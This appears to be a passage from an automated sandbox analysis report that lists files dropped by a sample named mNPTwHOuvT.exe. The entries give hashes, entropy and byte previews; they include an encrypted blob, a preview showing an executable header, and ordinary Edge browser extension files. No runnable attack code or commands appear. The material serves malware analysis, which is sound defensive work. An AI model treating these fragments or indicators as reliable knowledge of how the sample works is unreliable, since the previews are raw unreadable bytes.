                                                                                                                                                                                                                                                                                                                          SSDEEP:768:N4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SO:NBNIimuzaAwusP9
                                                                                                                                                                                                                                                                                                                          MD5:96917B2112CBC674CB3757A5F2361CEF
                                                                                                                                                                                                                                                                                                                          SHA1:3461C7E64CD646EBA1767E8381CC148D533DEE6E
                                                                                                                                                                                                                                                                                                                          SHA-256:1C9E9F68AB8585088F3A0122EADC0736BA6EE6A0491FB3B2C6603B94325FBF37
                                                                                                                                                                                                                                                                                                                          SHA-512:87AA165A775C67DC7F8C4C5AB6029ED9C53133ADACB17C60FEDC29501F772EF0C917B98056772AECD77DE3BC02129D2FB3E706AD09BB1262BC282EBA9AB19DF0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:p.?b..X*..<......?..}._.<...s...?...p.t.<..h.f2.?..$..V.<..4{#s.?U...g..<......?...w...<.J.....?I..Z...<.*.Ow5.?...@..<...FHv.?N.....<..!....?..j....<..v(...?..z..".<.i.6.8.?..?!...<.<...y.?G..o...<.....?.xeF...<.....?.G..T..<...1.<.?V.....<...{.}.?...0...<.......?...a@..<.....?..0....<....@.?....1..<..3...?...a.U.<.!.E...?.I.....<.......?.......<..j.)E.?O......<.I..W..?W.0.e).<...u...?.....T.<......?....?..<..X.J.?!.PO79.<../.Q..?.;..X..<.J]...?V:e:...<..Q....?.Wm..`.<.b;.SO.?4Td.'..<..Xw...?.Y....<...L"..?d...S.<._}?...?.T...x.<..[b.U.?.\.z#..<.^....?1......<..N....?.wa....<.......?....N9.<.a.X;[.?...Y'].<.@...?.....E.<.VOu...?!S..X.<..b.- .?C.:....<...|.a.?B.<..$.<..{...?+X.UG.<.m..e..?>U....<..o]2'.?....I..<....i.?G......<...o..? ...n.<.9.[...?...|.^.<.......?.>o.j..<..._.p.?1S...<..X....?.....l.<..~...?o.x....<.%3.d..?.....{.=.4 ..L.?...V!..=.b..#..?....@g.=....a..?G....z.=..]...?....6..=.o.J.V.?J.. .b.=.'4..?/..t.>.<.w.....?a.`....<.._....?.a...

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Wants

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):79872
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99780917309395
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:lk17AUhxNAJ1C2odypDXpg3yDYpLkvxTGzxMIhn40kiHTg01td2TMDvjCY:lk1r3UCzUp3D8LkvNGzxMIJ4viHM4fDZ
                                                                                                                                                                                                                                                                                                                          MD5:EE597F46D7E12C109A5F91C5B267754F
                                                                                                                                                                                                                                                                                                                          SHA1:B363C08BF46085CBAA2D75DCA46B7614250DC387
                                                                                                                                                                                                                                                                                                                          SHA-256:794C00137BE916FFFB54A35168339E4805DDBC73603EFAFEC1DC051B1983553A
                                                                                                                                                                                                                                                                                                                          SHA-512:7D5E06712F4CF040E671C9E574F4BA92D59D12226AC8CCCB080E9A19723D0DE91A5F16F31775367CEDBB11492E51A90E4271D7A12B6539564FAD235988D9F95C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.7i...;.&...P.V.Ma..........Y.D^$.......#...B.B..He..w.x.).RcV#...w...]4..e.!..^.....$.).q..q&.?.lB-l..4...=...{6&RJ ..0.....y&...17}...EH....x.&...D.}..).c.s.t_.l.&.c.0.R...#...9.C..B.G.I(.$*.Rh...W..t6...n...[...}....q.......[.)~w...`..%...v{........>....Y.Y..H.M...N3..$>...h.....V...{Y..-.Ri..I(,....\j.S'd.....a...I.{z....!$........^.nkON@....W..+..;....rJ..1......6Ok'*..f..(...j/E..}./..N.I....C..y......3. ..uK.{..CYn...le......k.2...&..:....4..$.d!..l4..6.v.g...z9..".f....h...K....D....8e...%U...8..........R$..]..D......)..t..Z...N.m..|D...C..4.7]q..........,.<K`..._..%.^...M.J..q...k...5#4qu%C[\.<\. 5.. ..a....d?]...TL...@;xw.|S%y.O.N.'..`.*mA..u.?LB.......=.m..4....... ...'>,Y.^."..H.D....23.b.].......m.&WBPA:.6...7.++.;z..,.2?..Q>qC...%..|..ILc./.<|..pYj.c.K.kt.B.R.x..v._.%.]......*.2.W)..r...Qb..#..../.L..$um.0..ln.....x=.k&U...0.0.{......d...h.G...|&.I..>.s.#S.}7+.<.D6....Iz7n8.;..Mk...%[....h..7O..H.n.}..../.<..x..>.m".....

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Webmasters

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2835
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4808049361591396
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:R59n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbgu:FSEA5O5W+MfH5S1CqlVJcI6mlbT
                                                                                                                                                                                                                                                                                                                          MD5:ADE1699758D1C7E3C92058DD41A6FF77
                                                                                                                                                                                                                                                                                                                          SHA1:E6EC211A293CA67BDFBED0DCB00956D0E85AB236
                                                                                                                                                                                                                                                                                                                          SHA-256:E27368DFBE3E822BA12F83CD62607A358BA4BD19383F2679B1C7F4E349E0964A
                                                                                                                                                                                                                                                                                                                          SHA-512:C36C0205A66AB26A06DE07B2243012CD25FBE0A6DEECE01F203657851807EBC2FEC2F93B2C8330397A88CFBD51C353EFE665708D813DDC21E4946BBD2FF7442F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SYDNEY........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2110
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.398202992485528
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr4:8e2Fa116uCntc5toYctBD/UM
                                                                                                                                                                                                                                                                                                                          MD5:72D3579399974B58467027C6653BDAF4
                                                                                                                                                                                                                                                                                                                          SHA1:8C83ECCE075C50047512FFCC6E87A17BF0AFE52E
                                                                                                                                                                                                                                                                                                                          SHA-256:2FAAD0C2AFDD1FF696279391DF8F416338E706BCD8ADFFD69096C56FBC79114B
                                                                                                                                                                                                                                                                                                                          SHA-512:774A700B308F202910B368EC89E0F2C8AEE3D430A22E9D271304974D370804E345DA158FBCFED2B2480F81ADDA61F2A2C4DE9CF86E8A736CD5B749BD0DE196C3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\f2ace83d-a38e-47e9-95e0-12a12f6b9924.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_130630354\5e83ab79-56a2-45c0-977a-68942c13ec4f.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_130630354\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_130630354\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_130630354\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_130630354\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\96b97450-a2ad-4c2f-b5af-152eb1fc6983.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
